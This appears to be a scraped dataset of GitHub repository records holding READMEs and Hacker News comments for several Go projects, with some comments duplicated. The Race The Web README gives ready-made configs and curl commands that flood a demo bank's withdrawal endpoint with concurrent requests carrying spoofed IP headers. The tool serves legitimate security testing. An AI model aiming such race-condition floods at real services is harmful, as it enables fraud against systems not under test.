Staffin](https://www.linkedin.com/in/benjaminstaffin)\nto end the never-ending stream of requests for internal CNAME entries. He\ndescribed it as AOL keywords for the corporate network. These days if you go to\nany reasonably sized company, you are likely to find a similar system. Etsy made\none after seeing that Twitter had one ... it's a contagious and useful little\ntool. So contagious, in fact, that many former Googlers that I know have built\nor contributed to a similar system post-Google. I am no different, this is my\n\"go\" link service.\n\nOne slight difference between this go service and Google's is that this one is also\ncapable of generating short links for you.\n\n## Installation\nThis tool is written in Go (ironically) and can be easily installed and started\nwith the following commands.\n\n```\nGOPATH=`pwd` go install github.com/kellegous/go\nbin/go\n```\n\nBy default, the service will put all of its data in the directory `data` and will\nlisten to requests on the port `8067`. Both of these, however, are easily configured\nusing the `--data=/path/to/data` and `--addr=:80` command line flags.\n\n## DNS Setup\nTo get the most benefit from the service, you should setup a DNS entry on your\nlocal network, `go.corp.mycompany.com`. Make sure that corp.mycompany.com is in\nthe search domains for each user on the network. This is usually easily accomplished\nby configuring your DHCP server. Now, simply typing \"go\" into your browser should\ntake you to the service, where you can register shortcuts. Obviously, those\nshortcuts will also be available by typing \"go/shortcut\".\n\n## Using the Service\nOnce you have it all setup, using it is pretty straight-forward.\n\n#### Create a new shortcut\nType `go/edit/my-shortcut` and enter the URL.\n\n#### Visit a shortcut\nType `go/my-shortcut` and you'll be redirected to the URL.\n\n#### Shorten a URL\nType `go` and enter the URL.\n", "readme_type": "markdown", "hn_comments": "ArchiveTeam is extracting all the data from Google Reader and uploading it to the Internet Archive. Help out by submitting your OPML file: https://news.ycombinator.com/item?id=5958119Thanks mihaip!Worked successfully in Windows CMD for me, without using the \\bin shell script: cd C:\\mihaip-readerisdead\n set PYTHON_HOME=C:\\mihaip-readerisdead\n C:\\path-to-py27 reader_archive\\reader_archive.py --output-directory C:\\mystuff\n\nLocked up at 251K out of 253K items for me, though. Restarting... success! Looks like it might have locked up trying to start the \"Fetching comments\" section on my first try.I guess archived RSS data for me isn't terribly important since most people seem to hide the rest of their content behind a \"More\" link to get those precious ad views.Warning to other impatient users:I didn't read the instructions too well, so the half hour I spent carefully deleting gigantic/uninteresting feeds out of my subscriptions.xml file was all for naught. Because I didn't know I needed to specify the opml_file on the command line, the script just logged into my Reader account (i.e., it walked me through the browser-based authorization process) and downloaded my subscriptions from there -- including all the gigantic/uninteresting subscriptions that I did NOT care to download.So now I've gone and downloaded 2,592,159 items, consuming 13 GB of space.I'm NOT complaining -- I actually think it's AWESOME that this is possible -- but if you don't want to download millions of items, be sure to read the instructions and use the opml_file directive.If this does what I think it does(And it seems to be doing it now on my machine), then this is truly, truly awesome.Thank you. mihaip, if you are ever in Houston I will buy you a beer/ and or a steak dinner.This is excellent, thank you for making this! I'm using it right now to make an offline archive of my Reader stuff.My only gripe would be the tool's inability to continue after a partial run, but since I won't be using this more than once that's probably OK.All web services should have a handy CLI extraction tool, preferably one that can be run from a CRON call. On that note, I'm very happy with gm_vault, as well.Edit: getting a lot of XML parse errors, by the way.Thank you for this!\nNow I can procrastinate on my own reader app for much longer :)Should we be concerned with errors like this? [W 130629 03:11:54 api:254] Requested item id tag:google.com,2005:reader/item/afe90dad8acde78b (-5771066408489326709), but it was not found in the result\n\nI'm getting ~1-2 per \"Fetch N/M item bodies\" line.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.I'm getting \"ImportError: No module named site\"echo %pythonpath% gives c:\\readerisdeadI copied 'base' from the readerisdead zipfile to c:\\python27\\lib & also copied the base folder into the same folder as reader_archive.pyC:\\readerisdead\\reader_archive\\reader_archive.py --output-directory C:\\googlereader gives \"ImportError: No module named site\"What am I doing wrong? How can I get this to work?This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.The title has it right. I never knew this existed, but it seems like something I've been looking for... Is it worth trying out at its current (open) state? Or is it just another failed Google Lab experiment?I smell DART in the air.\nThis won't be the last JS app they will abandon.I'm assuming this was the \"Brightly\" from that leaked Dart memo[0] some time back. Disappointing, I was a little excited to see what Google could bring to the IDE space.[0] https://gist.github.com/1208618/", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trezor/blockbook", "link": "https://github.com/trezor/blockbook", "tags": ["bitcoin", "backend", "trezor"], "stars": 522, "description": ":blue_book: Trezor address/account balance backend ", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/trezor/blockbook)](https://goreportcard.com/report/trezor/blockbook)\n\n# Blockbook\n\n**Blockbook** is back-end service for Trezor wallet. Main features of **Blockbook** are:\n\n- index of addresses and address balances of the connected block chain\n- fast index search\n- simple blockchain explorer\n- websocket, API and legacy Bitcore Insight compatible socket.io interfaces\n- support of multiple coins (Bitcoin and Ethereum type) with easy extensibility to other coins\n- scripts for easy creation of debian packages for backend and blockbook\n\n## Build and installation instructions\n\nOfficially supported platform is **Debian Linux** and **AMD64** architecture.\n\nMemory and disk requirements for initial synchronization of **Bitcoin mainnet** are around 32 GB RAM and over 180 GB of disk space. After initial synchronization, fully synchronized instance uses about 10 GB RAM.\nOther coins should have lower requirements, depending on the size of their block chain. Note that fast SSD disks are highly\nrecommended.\n\nUser installation guide is [here](https://wiki.trezor.io/User_manual:Running_a_local_instance_of_Trezor_Wallet_backend_(Blockbook)).\n\nDeveloper build guide is [here](/docs/build.md).\n\nContribution guide is [here](CONTRIBUTING.md).\n\n## Implemented coins\n\nBlockbook currently supports over 30 coins. The Trezor team implemented \n\n- Bitcoin, Bitcoin Cash, Zcash, Dash, Litecoin, Bitcoin Gold, Ethereum, Ethereum Classic, Dogecoin, Namecoin, Vertcoin, DigiByte, Liquid\n\nthe rest of coins were implemented by the community.\n\nTestnets for some coins are also supported, for example:\n- Bitcoin Testnet, Bitcoin Cash Testnet, ZCash Testnet, Ethereum Testnet Ropsten\n\nList of all implemented coins is in [the registry of ports](/docs/ports.md).\n\n## Common issues when running Blockbook or implementing additional coins\n\n#### Out of memory when doing initial synchronization\n\nHow to reduce memory footprint of the initial sync: \n\n- disable rocksdb cache by parameter `-dbcache=0`, the default size is 500MB\n- run blockbook with parameter `-workers=1`. This disables bulk import mode, which caches a lot of data in memory (not in rocksdb cache). It will run about twice as slowly but especially for smaller blockchains it is no problem at all.\n\nPlease add your experience to this [issue](https://github.com/trezor/blockbook/issues/43).\n\n#### Error `internalState: database is in inconsistent state and cannot be used`\n\nBlockbook was killed during the initial import, most commonly by OOM killer. \nBy default, Blockbook performs the initial import in bulk import mode, which for performance reasons does not store all data immediately to the database. If Blockbook is killed during this phase, the database is left in an inconsistent state. \n\nSee above how to reduce the memory footprint, delete the database files and run the import again. \n\nCheck [this](https://github.com/trezor/blockbook/issues/89) or [this](https://github.com/trezor/blockbook/issues/147) issue for more info.\n\n#### Running on Ubuntu\n\n[This issue](https://github.com/trezor/blockbook/issues/45) discusses how to run Blockbook on Ubuntu. If you have some additional experience with Blockbook on Ubuntu, please add it to [this issue](https://github.com/trezor/blockbook/issues/45).\n\n#### My coin implementation is reporting parse errors when importing blockchain\n\nYour coin's block/transaction data may not be compatible with `BitcoinParser` `ParseBlock`/`ParseTx`, which is used by default. In that case, implement your coin in a similar way we used in case of [zcash](https://github.com/trezor/blockbook/tree/master/bchain/coins/zec) and some other coins. The principle is not to parse the block/transaction data in Blockbook but instead to get parsed transactions as json from the backend.\n\n## Data storage in RocksDB\n\nBlockbook stores data the key-value store RocksDB. Database format is described [here](/docs/rocksdb.md).\n\n## API\n\nBlockbook API is described [here](/docs/api.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "txthinking/socks5", "link": "https://github.com/txthinking/socks5", "tags": ["socks", "socks5", "socks-protocol", "proxy"], "stars": 522, "description": "SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support", "lang": "Go", "repo_lang": "", "readme": "## socks5\n\n[English](README.md)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/txthinking/socks5)](https://goreportcard.com/report/github.com/txthinking/socks5)\n[![GoDoc](https://godoc.org/github.com/txthinking/socks5?status.svg)](https://godoc.org/github.com/txthinking/socks5)\n\n[\ud83d\udde3 News](https://t.me/txthinking_news)\n[\ud83e\ude78 Youtube](https://www.youtube.com/txthinking)\n[\u2764\ufe0f Sponsor](https://github.com/sponsors/txthinking)\n\nSOCKS Protocol Version 5 Library.\n\n\u5b8c\u6574 TCP/UDP \u548c IPv4/IPv6 \u652f\u6301.\n\u76ee\u6807: KISS, less is more, small API, code is like the original protocol.\n\n\u2764\ufe0f A project by [txthinking.com](https://www.txthinking.com)\n\n### \u83b7\u53d6\n```\n$ go get github.com/txthinking/socks5\n```\n\n### Struct\u7684\u6982\u5ff5 \u5bf9\u6807 \u539f\u59cb\u534f\u8bae\u91cc\u7684\u6982\u5ff5\n\n* Negotiation:\n * `type NegotiationRequest struct`\n * `func NewNegotiationRequest(methods []byte)`, in client\n * `func (r *NegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type NegotiationReply struct`\n * `func NewNegotiationReply(method byte)`, in server\n * `func (r *NegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewNegotiationReplyFrom(r io.Reader)`, client reads from server\n* User and password negotiation:\n * `type UserPassNegotiationRequest struct`\n * `func NewUserPassNegotiationRequest(username []byte, password []byte)`, in client\n * `func (r *UserPassNegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewUserPassNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type UserPassNegotiationReply struct`\n * `func NewUserPassNegotiationReply(status byte)`, in server\n * `func (r *UserPassNegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewUserPassNegotiationReplyFrom(r io.Reader)`, client reads from server\n* Request:\n * `type Request struct`\n * `func NewRequest(cmd byte, atyp byte, dstaddr []byte, dstport []byte)`, in client\n * `func (r *Request) WriteTo(w io.Writer)`, client writes to server\n * `func NewRequestFrom(r io.Reader)`, server reads from client\n * After server gets the client's *Request, processes...\n* Reply:\n * `type Reply struct`\n * `func NewReply(rep byte, atyp byte, bndaddr []byte, bndport []byte)`, in server\n * `func (r *Reply) WriteTo(w io.Writer)`, server writes to client\n * `func NewReplyFrom(r io.Reader)`, client reads from server\n* Datagram:\n * `type Datagram struct`\n * `func NewDatagram(atyp byte, dstaddr []byte, dstport []byte, data []byte)`\n * `func NewDatagramFromBytes(bb []byte)`\n * `func (d *Datagram) Bytes()`\n\n### \u9ad8\u7ea7 API\n\n> \u8fd9\u53ef\u4ee5\u6ee1\u8db3\u7ecf\u5178\u573a\u666f\uff0c\u7279\u6b8a\u573a\u666f\u63a8\u8350\u4f60\u9009\u62e9\u4e0a\u9762\u7684\u5c0fAPI\u6765\u81ea\u5b9a\u4e49\u3002\n\n**Server**: \u652f\u6301UDP\u548cTCP\n\n* `type Server struct`\n* `type Handler interface`\n * `TCPHandle(*Server, *net.TCPConn, *Request) error`\n * `UDPHandle(*Server, *net.UDPAddr, *Datagram) error`\n\n\u4e3e\u4f8b:\n\n```\nserver, _ := NewClassicServer(addr, ip, username, password, tcpTimeout, udpTimeout)\nserver.ListenAndServe(Handler)\n```\n\n**Client**: \u652f\u6301TCP\u548cUDP, \u8fd4\u56denet.Conn\n\n* `type Client struct`\n\n\u4e3e\u4f8b:\n\n```\nclient, _ := socks5.NewClient(server, username, password, tcpTimeout, udpTimeout)\nconn, _ := client.Dial(network, addr)\n```\n\n\n### \u8c01\u5728\u4f7f\u7528\u6b64\u9879\u76ee\n\n- Brook: https://github.com/txthinking/brook\n- Shiliew: https://www.txthinking.com/shiliew.html\n- dismap: https://github.com/zhzyker/dismap\n- emp3r0r: https://github.com/jm33-m0/emp3r0r\n- hysteria: https://github.com/apernet/hysteria\n- mtg: https://github.com/9seconds/mtg\n- trojan-go: https://github.com/p4gefau1t/trojan-go\n\n## \u5f00\u6e90\u534f\u8bae\n\n\u57fa\u4e8e MIT \u534f\u8bae\u5f00\u6e90\n", "readme_type": "markdown", "hn_comments": "Next time someone says to me that language's popularity doesn't matter for it's utility, I'll remember how Go's socks library appears on the front page of HN, while my pull request the Haskell's socks library (which implements the most basic feature that author added to the top of TODO list himself) is sitting unmerged and uncommented now for almost a year.(1) (If I sound bitter it's because I am.)Seriously though, such \"boring\" libraries that you just need in your toolbox are a great way to evaluate the health of the whole ecosystem.[1][https://github.com/vincenthz/hs-socks/pull/24]If I only want the client side, does this add anything over https://godoc.org/golang.org/x/net/proxy ?Honest question: What do people use Socks for? Personally I haven\u2019t used it since Firesheep...Last time I needed a SOCKS5 server + client in Go, I remember using github.com/getlantern/go-socks5. What does this offer above that?I will always say this was a complete hack to a specific time in history. Having SOCKS in your toolbelt of tricks is always handy and can make hard things surprisingly easy.Last time was I needed to tunnel a request from my development environment into a production VPN to contact a service which had IP access restrictions.On Firefox, your footer is very difficult to read. The font is too light on the background. Hope it is not intentional.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ericm/stonks", "link": "https://github.com/ericm/stonks", "tags": ["stock-market", "stock-data", "stocks", "stock-cli", "cli", "stock-market-data", "terminal-graphics", "go", "golang", "linux", "macos", "graphs", "tracker", "aur", "stock-visualizer", "wtfutil", "curl", "ascii-art", "terminal-based", "hacktoberfest"], "stars": 522, "description": "Stonks is a terminal based stock visualizer and tracker that displays realtime stocks in graph format in a terminal. See how fast your stonks will crash.", "lang": "Go", "repo_lang": "", "readme": "# ![Stonks](./assets/stonks.svg?raw=true)\n\n[![GitHub](https://img.shields.io/github/license/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/blob/master/LICENSE)\n[![GitHub contributors](https://img.shields.io/github/contributors/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/graphs/contributors)\n[![GitHub last commit](https://img.shields.io/github/last-commit/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/commits/master)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/releases)\n[![AUR version](https://img.shields.io/aur/version/stonks?style=for-the-badge)](https://aur.archlinux.org/packages/stonks/)\n\nStonks is a terminal based stock visualizer and tracker.\n\n## Installation\n\nRequirements: golang >= 1.13\n\n### Manual\n\n1. Clone the repo\n2. Run `make && make install`\n\n### Packages\n\nStonks is available on:\n\n- [The AUR](https://aur.archlinux.org/packages/stonks/). You can install it on arch linux with my other project [yup](https://github.com/ericm/yup): `$ yup -S stonks`\n\n- HomeBrew: `brew install ericm/stonks/stonks`\n\n### Binaries\n\nBinaries are now available for Windows, MacOSX and Linux under each [release](https://github.com/ericm/stonks/releases)\n\n## [Online installationless usage (via curl)](http://stonks.icu)\n\nYou can now access basic stock graphs for passed stock tickers via the stonks HTTPS client (https://stonks.icu).\n\nTry it:\n```\n$ curl -L stonks.icu/amd/ba\n```\n\n## Usage\n\nIt uses Yahoo Finance as a backend so use the ticker format as seen on their website.\n\n```\nDisplays realtime stocks in graph format in a terminal\n\nUsage:\n stonks [flags]\n\nFlags:\n -d, --days int 24 hour period of stocks from X of days ago.\n -e, --extra Include extra pre + post time. (Only works for day)\n -h, --help help for stonks\n -i, --interval string stonks -i X[m|h] (eg 15m, 5m, 1h, 1d) (default \"15m\")\n -n, --name string Optional name for a stonk save\n -r, --remove string Remove an item from favourites\n -s, --save string Add an item to the default stonks command. (Eg: -s AMD -n \"Advanced Micro Devices\")\n -t, --theme string Display theme for the chart (Options: \"line\", \"dot\", \"icon\")\n -v, --version stonks version\n -w, --week Display the last week (will set interval to 1d)\n -y, --year Display the last year (will set interval to 5d)\n --ytd Display the year to date (will set interval to 5d)\n```\n\n### `$ stonks`\n\nGives graphs and current value/change of _saved_ stocks.\n![Stonks](./assets/1.png)\n\n### `$ stonks -s AMD -n \"Advanced Micro Devices\"`\n\nAdd a favourite stock to be tracked with `$ stonks`\n\n### `$ stonks -r AMD`\n\nRemove a favourite stock\n\n### `$ stonks AMD`\n\nGives the current stock for each ticker passed that day\n\n![Stonks](./assets/2.png)\n\n### `$ stonks -w AMD`\n\nGives the current stock for each ticker passed _for the past week_\n\n![Stonks](./assets/3.png)\n\n### `$ stonks -d 4 AMD`\n\nGives the current stock for each ticker passed X days ago\n\n![Stonks](./assets/4.png)\n\n## Configuration\n\nThe config file is located at `~/.config/stonks.yml`\n\nYou can change the following options:\n\n```yml\nconfig:\n default_theme: 0 # 0: Line, 1: Dots, 2: Icons\n favourites_height: 12 # Height of the chart in each info panel\n standalone_height: 12\n```\n\n## Usage with wtfutil\n\nYou can use a program such as [wtfutil](https://wtfutil.com/) (On Arch Linux: `yup -S wtfutil`) to make stonks refresh automatically.\nSee the sample `~/.config/wtf/config.yml` provided by [Gideon Wolfe\n](https://github.com/GideonWolfe):\n\n```yml\nwtf:\n colors:\n background: black\n border:\n focusable: darkslateblue\n focused: blue\n normal: gray\n checked: yellow\n highlight:\n fore: black\n back: gray\n rows:\n even: yellow\n odd: white\n grid:\n # How _wide_ the columns are, in terminal characters. In this case we have\n # four columns, each of which are 35 characters wide.\n columns: [33, 33, 33]\n # How _high_ the rows are, in terminal lines. In this case we have four rows\n # that support ten line of text and one of four.\n rows: [20, 20, 20, 20, 20, 20, 20, 20]\n refreshInterval: 1\n\n mods:\n tech:\n type: cmdrunner\n args: [\"tsla\", \"intc\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 0\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n title: \"\ud83e\udd16 Tech\"\n financial:\n type: cmdrunner\n args: [\"jpm\", \"v\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 2\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n```\n", "readme_type": "markdown", "hn_comments": "?? Seems locked from read as well> You need permission; Want in? Ask for access, or switch to an account with permission.It was changed to a read only link, not sure why. I'd have appreciated addition from the HN folksLeverage should be a column as many companies that are highly levered will not have the resources to outlast this crisis.Interesting sheet.Might be useful to also add columns to show the current PE and also the market vs book value.Actual remarks by Boston Fed's Rosengren here:https://www.bostonfed.org/news-and-events/speeches/2019/asse...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emicklei/proto", "link": "https://github.com/emicklei/proto", "tags": ["protobuf", "parser", "proto3", "formatter", "proto2", "golang-package", "protocol-buffers", "protobuf-parser"], "stars": 522, "description": "parser for Google ProtocolBuffers definition", "lang": "Go", "repo_lang": "", "readme": "# proto\n\n[![Build Status](https://api.travis-ci.com/emicklei/proto.svg?branch=master)](https://travis-ci.com/github/emicklei/proto)\n[![Go Report Card](https://goreportcard.com/badge/github.com/emicklei/proto)](https://goreportcard.com/report/github.com/emicklei/proto)\n[![GoDoc](https://pkg.go.dev/badge/github.com/emicklei/proto)](https://pkg.go.dev/github.com/emicklei/proto)\n[![codecov](https://codecov.io/gh/emicklei/proto/branch/master/graph/badge.svg)](https://codecov.io/gh/emicklei/proto)\n\nPackage in Go for parsing Google Protocol Buffers [.proto files version 2 + 3](https://developers.google.com/protocol-buffers/docs/reference/proto3-spec)\n\n### install\n\n go get -u -v github.com/emicklei/proto\n\n### usage\n\n\tpackage main\n\n\timport (\n\t\t\"fmt\"\n\t\t\"os\"\n\n\t\t\"github.com/emicklei/proto\"\n\t)\n\n\tfunc main() {\n\t\treader, _ := os.Open(\"test.proto\")\n\t\tdefer reader.Close()\n\n\t\tparser := proto.NewParser(reader)\n\t\tdefinition, _ := parser.Parse()\n\n\t\tproto.Walk(definition,\n\t\t\tproto.WithService(handleService),\n\t\t\tproto.WithMessage(handleMessage))\n\t}\n\n\tfunc handleService(s *proto.Service) {\n\t\tfmt.Println(s.Name)\n\t}\n\n\tfunc handleMessage(m *proto.Message) {\n\t\tlister := new(optionLister)\n\t\tfor _, each := range m.Elements {\n\t\t\teach.Accept(lister)\n\t\t}\n\t\tfmt.Println(m.Name)\n\t}\n\n\ttype optionLister struct {\n\t\tproto.NoopVisitor\n\t}\n\n\tfunc (l optionLister) VisitOption(o *proto.Option) {\n\t\tfmt.Println(o.Name)\n\t}\n\n### validation\n\nCurrent parser implementation is not completely validating `.proto` definitions.\nIn many but not all cases, the parser will report syntax errors when reading unexpected charaters or tokens.\nUse some linting tools (e.g. https://github.com/uber/prototool) or `protoc` for full validation.\n\n### contributions\n\nSee [proto-contrib](https://github.com/emicklei/proto-contrib) for other contributions on top of this package such as protofmt, proto2xsd and proto2gql.\n[protobuf2map](https://github.com/emicklei/protobuf2map) is a small package for inspecting serialized protobuf messages using its `.proto` definition.\n\n\u00a9 2017-2022, [ernestmicklei.com](http://ernestmicklei.com). MIT License. Contributions welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kwok", "link": "https://github.com/kubernetes-sigs/kwok", "tags": ["k8s-sig-scheduling", "kubernetes", "simulator", "docker", "golang", "mulit-cluster", "nerdctl"], "stars": 523, "description": "Kubernetes WithOut Kubelet - Simulates thousands of Nodes and Clusters.", "lang": "Go", "repo_lang": "", "readme": "# `KWOK` (`K`ubernetes `W`ith`O`ut `K`ubelet)\n\n\n\n[KWOK] is a toolkit that enables setting up a cluster of thousands of Nodes in seconds.\nUnder the scene, all Nodes are simulated to behave like real ones, so the overall approach employs\na pretty low resource footprint that you can easily play around on your laptop.\n\nSo far we provide two tools:\n\n- **kwok:** Core of this repo. It simulates thousands of fake Nodes.\n- **kwokctl:** A CLI to facilitate creating and managing clusters simulated by Kwok.\n\nPlease see [our website] for more in-depth information.\n\n\n\n## Community\n\nSee our own [contributor guide] and the Kubernetes [community page].\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct][code of conduct].\n\n[KWOK]: https://sigs.k8s.io/kwok\n[our website]: https://kwok.sigs.k8s.io\n[community page]: https://kubernetes.io/community/\n[contributor guide]: https://kwok.sigs.k8s.io/docs/contributing/getting-started\n[code of conduct]: https://github.com/kubernetes-sigs/kwok/blob/main/code-of-conduct.md\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheHackerDev/race-the-web", "link": "https://github.com/TheHackerDev/race-the-web", "tags": ["security-tools", "race-conditions", "security", "appsec", "devops-tools", "infosec"], "stars": 521, "description": "Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/aaronhnatiw/race-the-web)](https://goreportcard.com/report/github.com/aaronhnatiw/race-the-web) [![Build Status](https://travis-ci.org/aaronhnatiw/race-the-web.svg?branch=master)](https://travis-ci.org/aaronhnatiw/race-the-web)\n\n# Race The Web (RTW)\n\nTests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) *simultaneously*, and then compares the responses from the server for uniqueness. Includes a number of configuration options.\n\n## UPDATE: Now CI Compatible!\n\nVersion 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (\u00e0 la [Jenkins](https://jenkins.io/), [Travis](https://travis-ci.org/), or [Drone](https://github.com/drone/drone)), through the use of an easy to use HTTP API. More information can be found in the **Usage** section below.\n\n## Watch The Talk\n\n[![Racing the Web - Hackfest 2016](https://img.youtube.com/vi/4T99v957I0o/0.jpg)](https://www.youtube.com/watch?v=4T99v957I0o)\n\n_Racing the Web - Hackfest 2016_\n\nSlides: https://www.slideshare.net/AaronHnatiw/racing-the-web-hackfest-2016\n\n## Usage\n\nWith configuration file\n\n```sh\n$ race-the-web config.toml\n```\n\nAPI\n\n```sh\n$ race-the-web\n```\n\n### Configuration File\n\n**Example configuration file included (_config.toml_):**\n\n```toml\n# Sample Configurations\n\n# Send 100 requests to each target\ncount = 100\n# Enable verbose logging\nverbose = true\n# Use an http proxy for all connections\nproxy = \"http://127.0.0.1:8080\"\n\n# Specify the first request\n[[requests]]\n # Use the GET request method\n method = \"GET\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay?val=1000\"\n # Set the request body.\n # body = \"body=text\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=12345\",\"JSESSIONID=67890\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Follow redirects\n redirects = true\n\n# Specify the second request\n[[requests]]\n # Use the POST request method\n method = \"POST\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay\"\n # Set the request body.\n body = \"val=1000\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=ABCDE\",\"JSESSIONID=FGHIJ\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Do not follow redirects\n redirects = false\n```\n\nTOML Spec: https://github.com/toml-lang/toml\n\n### API\n\nSince version 2.0.0, RTW now has a full-featured API, which allows you to easily integrate it into your continuous integration (CI) tool of choice. This means that you can quickly and easily test your web application for race conditions automatically whenever you commit your code.\n\nThe API works through a simple set of HTTP calls. You provide input in the form of JSON and receive a response in JSON. The 3 API endpoints are as follows:\n\n- `POST` `http://127.0.0.1:8000/set/config`: Provide configuration data (in JSON format) for the race condition test you want to run (examples below).\n- `GET` `http://127.0.0.1:8000/get/config`: Fetch the current configuration data. Data is returned in a JSON response.\n- `POST` `http://127.0.0.1:8000/start`: Begin the race condition test using the configuration that you have already provided. All findings are returned back in JSON output.\n\n#### Example JSON configuration (sent to `/set/config` using a `POST` request)\n\n```json\n{\n \"count\": 100,\n \"verbose\": false,\n \"requests\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"cookies\": [\n \"sessionId=dutwJx8kyyfXkt9tZbboT150TjZoFuEZGRy8Mtfpfe7g7UTPybCZX6lgdRkeOjQA\"\n ],\n \"body\": \"amount=1\",\n \"redirects\": true\n }\n ]\n}\n```\n\n#### Example workflow using curl\n\n\n1. Send the configuration data\n\n```sh\n$ curl -d '{\"count\":100,\"verbose\":false,\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"body\":\"amount=1\",\"redirects\":true}]}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:8000/set/config\n\n{\"message\":\"configuration saved\"}\n```\n\n2. Retrieve the configuration data for validation\n\n```sh\n$ curl -X GET http://127.0.0.1:8000/get/config\n\n{\"count\":100,\"verbose\":false,\"proxy\":\"\",\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"body\":\"amount=1\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"headers\":null,\"redirects\":true}]}\n```\n\n3. Start the race condition test\n\n```sh\n$ curl -X POST http://127.0.0.1:8000/start\n```\n\nResponse (expanded for visibility):\n\n```JSON\n[\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9999

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
